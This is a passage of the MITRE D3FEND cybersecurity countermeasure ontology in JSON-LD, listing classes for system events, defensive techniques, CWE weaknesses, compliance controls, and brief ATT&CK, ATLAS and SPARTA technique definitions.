      "@id": "d3f:AddUserToGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user is added to a group, granting the user the permissions and privileges associated with the group.",
      "rdfs:label": "Add User to Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "_:Nda2bd42d8f084afda5752eb7351e3e3b"
        },
        {
          "@id": "_:N1c70aede12834e718944a00e20cf0145"
        },
        {
          "@id": "_:Nab1a10d68539441d81160a1762061fa3"
        }
      ]
    },
    {
      "@id": "_:Nda2bd42d8f084afda5752eb7351e3e3b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N1c70aede12834e718944a00e20cf0145",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupCreationEvent"
      }
    },
    {
      "@id": "_:Nab1a10d68539441d81160a1762061fa3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:OutboundInternetEncryptedRemoteTerminalTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet encrypted remote terminal traffic is encrypted network traffic for a standard remote terminal protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Encrypted Remote Terminal Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "skos:altLabel": [
        "Outbound Internet Encrypted RDP Traffic",
        "Outbound Internet Encrypted SSH Traffic"
      ]
    },
    {
      "@id": "d3f:CCI-002662_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors outbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OutboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002662"
    },
    {
      "@id": "d3f:LocalAccountMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LocalAccountMonitoring"
      ],
      "d3f:analyzes": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:d3fend-id": "D3-LAM",
      "d3f:definition": "Analyzing local user accounts to detect unauthorized activity.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AuditUserAccountManagement"
        },
        {
          "@id": "d3f:Reference-CAR-2016-04-004_SuccessfulLocalAccountLogin"
        },
        {
          "@id": "d3f:Reference-OSQueryWindowsUserCollectionCode"
        }
      ],
      "rdfs:label": "Local Account Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:Nf610c35e69a840c98357c5e38ca288fe"
        }
      ]
    },
    {
      "@id": "_:Nf610c35e69a840c98357c5e38ca288fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:T0817",
      "@type": "owl:Class",
      "d3f:attack-id": "T0817",
      "d3f:definition": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website.",
      "rdfs:label": "Drive-by Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Drive-by Compromise"
    },
    {
      "@id": "d3f:SenderReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SenderReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Email"
      },
      "d3f:d3fend-id": "D3-SRA",
      "d3f:definition": "Ascertaining sender reputation based on information associated with a message (e.g. email/instant messaging).",
      "d3f:kb-article": "## How it works\n\nSender trust rating can be considered an indicator of the level of security risk and/or a trust level associated with a sender. The features considered in determining the trust rating include:\n\n* Length of time sender has sent emails to the enterprise\n* Number of recipients in the enterprise the sender interacts with\n* Sender vs. enterprise originated message ratio\n* Sender messages opened vs. not-opened ratio\n* Number of emails received from this sender\n* Number of emails replied to this sender\n* Number of emails from this sender not opened\n* Number of emails from this sender not opened that contain an attachment\n* Number of emails from this sender not opened that contain a URL\n* Number of emails sent to this sender\n* Number of email replies received from this sender.\n\nHigher values for the number of recipients the sender has interacted with or the number of emails received from the sender, for example, result in a higher trust rating. The trust rating can categorize the sender as unrated, neutral, trusted, suspicious, or malicious.\n\n## Considerations\nLegitimate emails from a sender may receive a lower trust rating over time if the sender's domain gets spoofed and is used to send unauthorized emails.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemsAndMethodsForDetectingAnd_orHandlingTargetedAttacksInTheEmailChannel_GraphusInc"
      },
      "rdfs:label": "Sender Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageAnalysis"
        },
        {
          "@id": "_:Nc81aa4e346304ae7b9ac3cc9a869c382"
        }
      ]
    },
    {
      "@id": "_:Nc81aa4e346304ae7b9ac3cc9a869c382",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CWE-202",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-202",
      "d3f:definition": "When a product tries to keep information confidential, an attacker can often infer some of that information by using statistics.",
      "rdfs:label": "Exposure of Sensitive Information Through Data Queries",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1230"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Breadth and Depth of Coverage",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "RA-5(3)"
    },
    {
      "@id": "d3f:T1464",
      "@type": "owl:Class",
      "d3f:attack-id": "T1464",
      "d3f:definition": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth that services rely on, or by jamming the signal going to or coming from devices.",
      "rdfs:label": "Network Denial of Service - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Network Denial of Service"
    },
    {
      "@id": "d3f:DE-0003.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.01",
      "d3f:definition": "The Vehicle Command Counter (VCC) tracks how many commands the spacecraft has accepted. An adversary masks activity by zeroing, freezing, or selectively decrementing the VCC, or by steering actions through paths that do not increment it (maintenance dictionaries, alternate receivers, hidden handlers). They may also overwrite the telemetry field that reports the VCC so ground displays show a lower or steady count while high volumes of commands are processed. This breaks simple “command volume” heuristics and makes bursty activity look normal.",
      "d3f:modifies": {
        "@id": "d3f:SystemPlatformVariable"
      },
      "rdfs:label": "Vehicle Command Counter (VCC) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Ndb906e420d58457ba5752f5dcccace52"
        }
      ],
      "skos:prefLabel": "Vehicle Command Counter (VCC)"
    },
    {
      "@id": "_:Ndb906e420d58457ba5752f5dcccace52",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:PearsonsCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PCC",
      "d3f:kb-article": "## References\nWolfram MathWorld. (n.d.). Correlation Coefficient. [Link](https://mathworld.wolfram.com/CorrelationCoefficient.html)",
      "rdfs:label": "Pearson's Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "http://d3fend.mitre.org/ontologies/d3fend.owl",
      "@type": "owl:Ontology",
      "d3f:release-date": {
        "@type": "xsd:dateTime",
        "@value": "2026-03-31T00:12:00+00:00"
      },
      "dcterms:description": "D3FEND is a framework which encodes a countermeasure knowledge base as a knowledge graph. The graph contains the types and relations that define key concepts in the cybersecurity countermeasure domain and the relations necessary to link those concepts to each other. Each of these concepts and relations are linked to references in the cybersecurity literature.",
      "dcterms:license": "MIT",
      "dcterms:title": "D3FEND™ - A knowledge graph of cybersecurity countermeasures",
      "owl:versionIRI": {
        "@id": "http://d3fend.mitre.org/ontologies/d3fend/1.4.0/d3fend.owl"
      },
      "owl:versionInfo": "1.4.0",
      "rdfs:comment": "Use of the D3FEND Knowledge Graph, and the associated references from this ontology are subject to the Terms of Use. D3FEND is funded by the National Security Agency (NSA) Cybersecurity Directorate and managed by the National Security Engineering Center (NSEC) which is operated by The MITRE Corporation. D3FEND™ and the D3FEND logo are trademarks of The MITRE Corporation. This software was produced for the U.S. Government under Basic Contract No. W56KGU-18-D0004, and is subject to the Rights in Noncommercial Computer Software and Noncommercial Computer Software Documentation Clause 252.227-7014 (FEB 2012) Copyright 2022 The MITRE Corporation."
    },
    {
      "@id": "d3f:T1543.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1543.005",
      "d3f:definition": "Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.",
      "rdfs:label": "Container Service",
      "rdfs:subClassOf": {
        "@id": "d3f:T1543"
      }
    },
    {
      "@id": "d3f:CCI-000022_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces one or more organization-defined nondiscretionary access control policies over an organization-defined set of users and resources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000022"
    },
    {
      "@id": "d3f:implemented-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x implemented-by y: The entity x is realized or brought into operation by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:implements"
      },
      "rdfs:label": "implemented-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:ProcessImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:definition": "A process image is a copy of a given process's state at a given point in time. It is often used to create persistence within an otherwise volatile system.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/System_image#Process_images"
      },
      "rdfs:label": "Process Image",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputingImage"
        },
        {
          "@id": "_:N60b89e93d1e14af29ab2a7bb0245cf7d"
        }
      ]
    },
    {
      "@id": "_:N60b89e93d1e14af29ab2a7bb0245cf7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:T1059.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.003",
      "d3f:definition": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)",
      "rdfs:label": "Windows Command Shell",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:authorizes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x authorizes y: A subject x grants authorization or clearance for an agent y to use an object.  This relation indicates an authorization event has occurred.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00804987-v"
      },
      "rdfs:label": "authorizes",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00805664-v"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:EventLogRotateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event log is rotated, often as part of log rotation policies to manage storage and ensure continuity.",
      "rdfs:label": "Event Log Rotate Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:AML.T0000.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000.001",
      "d3f:definition": "Pre-Print repositories, such as arXiv, contain the latest academic research papers that haven't been peer reviewed.\nThey may contain research notes, or technical reports that aren't typically published in journals or conference proceedings.\nPre-print repositories also serve as a central location to share papers that have been accepted to journals.\nSearching pre-print repositories provides adversaries with a relatively up-to-date view of what researchers in the victim organization are working on.",
      "rdfs:label": "Pre-Print Repositories - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0000"
      },
      "skos:prefLabel": "Pre-Print Repositories"
    },
    {
      "@id": "d3f:HardwareDeviceUnbindEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device is logically unbound from a system or process, releasing it from exclusive use or integration.",
      "rdfs:label": "Hardware Device Unbind Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N9a03aaab26ec438eb7cce0d8b255f4a5"
        }
      ]
    },
    {
      "@id": "_:N9a03aaab26ec438eb7cce0d8b255f4a5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceBindEvent"
      }
    },
    {
      "@id": "d3f:T1505.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:MessageTransferAgent"
      },
      "d3f:attack-id": "T1505.002",
      "d3f:definition": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.",
      "d3f:modifies": {
        "@id": "d3f:MailServer"
      },
      "rdfs:label": "Transport Agent",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:N3aa39d7de3c34d4e8943117309b0b33d"
        },
        {
          "@id": "_:N63fdcbfad85344d78f15f50af5268011"
        }
      ]
    },
    {
      "@id": "_:N3aa39d7de3c34d4e8943117309b0b33d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MessageTransferAgent"
      }
    },
    {
      "@id": "_:N63fdcbfad85344d78f15f50af5268011",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailServer"
      }
    },
    {
      "@id": "d3f:DS0009",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures",
      "d3f:exactly": {
        "@id": "d3f:Process"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Process Metadata component",
      "rdfs:label": "Process (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-002201_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, uses organization-defined data type identifiers to validate data essential for information flow decisions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002201"
    },
    {
      "@id": "d3f:OperatingSystemConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information used to configure the services, parameters, and initial settings for an operating system.",
      "rdfs:label": "Operating System Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Histogramming",
      "@type": "owl:Class",
      "rdfs:label": "Histogramming",
      "rdfs:subClassOf": {
        "@id": "d3f:Summarizing"
      }
    },
    {
      "@id": "d3f:CWE-780",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-780",
      "d3f:definition": "The product uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.",
      "rdfs:label": "Use of RSA Algorithm without OAEP",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-327"
      }
    },
    {
      "@id": "d3f:Reference-FileAndFolderPermissions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/bb727008(v=technet.10)?redirectedfrom=MSDN"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:LocalFilePermissions"
      },
      "d3f:kb-reference-title": "File and Folder Permissions",
      "rdfs:label": "Reference - File and Folder Permissions"
    },
    {
      "@id": "d3f:AML.T0058",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0058",
      "d3f:definition": "Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [AI Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010).",
      "rdfs:label": "Publish Poisoned Models - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0058"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Publish Poisoned Models"
    },
    {
      "@id": "d3f:CWE-691",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-691",
      "d3f:definition": "The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways.",
      "rdfs:label": "Insufficient Control Flow Management",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:CWE-942",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-942",
      "d3f:definition": "The product uses a cross-domain policy file that includes domains that should not be trusted.",
      "rdfs:label": "Permissive Cross-domain Policy with Untrusted Domains",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-183"
        },
        {
          "@id": "d3f:CWE-863"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1176",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1176",
      "d3f:definition": "The product performs CPU computations using algorithms that are not as efficient as they could be for the needs of the developer, i.e., the computations can be optimized further.",
      "rdfs:label": "Inefficient CPU Computation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CWE-500",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-500",
      "d3f:definition": "An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways.",
      "rdfs:label": "Public Static Field Not Marked Final",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-493"
      }
    },
    {
      "@id": "d3f:CWE-1070",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1070",
      "d3f:definition": "The product contains a serializable, storable data element such as a field or member, but the data element contains member elements that are not serializable.",
      "rdfs:label": "Serializable Data Element Containing non-Serializable Item Elements",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1076"
        },
        {
          "@id": "d3f:CWE-710"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-006%3ALocalPermissionGroupDiscovery_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-006/"
      },
      "d3f:kb-abstract": "Cyber actors frequently enumerate local or domain permissions groups. The net utility is usually used for this purpose. This analytic looks for any instances of net.exe, which is not normally used for benign purposes, although system administrator actions may trigger false positives.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-006: Local Permission Group Discovery",
      "rdfs:label": "Reference - CAR-2020-11-006: Local Permission Group Discovery - MITRE"
    },
    {
      "@id": "d3f:T0834",
      "@type": "owl:Class",
      "d3f:attack-id": "T0834",
      "d3f:definition": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.",
      "rdfs:label": "Native API - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Native API"
    },
    {
      "@id": "d3f:T1567.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1567.003",
      "d3f:definition": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information.",
      "rdfs:label": "Exfiltration to Text Storage Sites",
      "rdfs:subClassOf": {
        "@id": "d3f:T1567"
      }
    },
    {
      "@id": "d3f:CWE-395",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-395",
      "d3f:definition": "Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer.",
      "rdfs:label": "Use of NullPointerException Catch to Detect NULL Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-705"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:LinuxMmap",
      "@type": "owl:Class",
      "d3f:definition": "Map files or devices into memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/mmap.2.html"
      },
      "rdfs:label": "Linux Mmap",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:has-sender",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-sender y: An agent y is the sender and encoder of the information contained in communication x.",
      "rdfs:isDefinedBy": {
        "@id": "http://www.ontologyrepository.com/CommonCoreOntologies/has_sender"
      },
      "rdfs:label": "has-sender",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/10598214-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Authorization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Authorization is the function of specifying access rights to resources related to information security and computer security in general and to access control in particular. More formally, \"to authorize\" is to define an access policy. For example, human resources staff is normally authorized to access employee records and this policy is usually formalized as access control rules in a computer system. During operation, the system uses the access control rules to decide whether access requests from (authenticated) consumers shall be approved (granted) or disapproved (rejected). Resources include individual files or an item's data, computer programs, computer devices and functionality provided by computer applications. Examples of consumers are computer users, computer program",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Authorization"
      },
      "rdfs:label": "Authorization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveAction"
        },
        {
          "@id": "_:Na42f92a5c96043599fc9b4c2304bef07"
        }
      ]
    },
    {
      "@id": "_:Na42f92a5c96043599fc9b4c2304bef07",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authorizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Access"
      }
    },
    {
      "@id": "d3f:T0854",
      "@type": "owl:Class",
      "d3f:attack-id": "T0854",
      "d3f:definition": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands.  Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Serial Connection Enumeration - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Serial Connection Enumeration"
    },
    {
      "@id": "d3f:T1590.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.002",
      "d3f:definition": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)",
      "rdfs:label": "DNS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:T1587.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.003",
      "d3f:definition": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).",
      "rdfs:label": "Digital Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:GPT",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GPT",
      "d3f:definition": "Generative pre-trained transformers (GPT) are a type of large language model (LLM) and a prominent framework for generative artificial intelligence.",
      "d3f:kb-article": "## References\nGenerative pre-trained transformer. (n.d.). In Wikipedia. [Link](https://en.wikipedia.org/wiki/Generative_pre-trained_transformer)",
      "d3f:synonym": "Generative Pre-trained Transformer",
      "rdfs:label": "GPT",
      "rdfs:subClassOf": {
        "@id": "d3f:Transformer-basedLearning"
      }
    },
    {
      "@id": "d3f:ObjectFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An object file is a file that contains relocatable machine code.",
      "rdfs:label": "Object File",
      "rdfs:seeAlso": {
        "@id": "dbr:Object_file"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-434",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-434",
      "d3f:definition": "The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.",
      "d3f:synonym": "Unrestricted File Upload",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Unrestricted Upload of File with Dangerous Type",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-669"
        },
        {
          "@id": "_:Nf02c858804c84efc95aca1715f76730c"
        }
      ]
    },
    {
      "@id": "_:Nf02c858804c84efc95aca1715f76730c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:OTEstablishRemoteConnectionCommand",
      "@type": "owl:Class",
      "d3f:definition": "Used to establish a TCP/IP Connection to the target device.",
      "rdfs:label": "OT Establish Remote Connection Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTConnectionCommand"
      }
    },
    {
      "@id": "d3f:CWE-45",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-45",
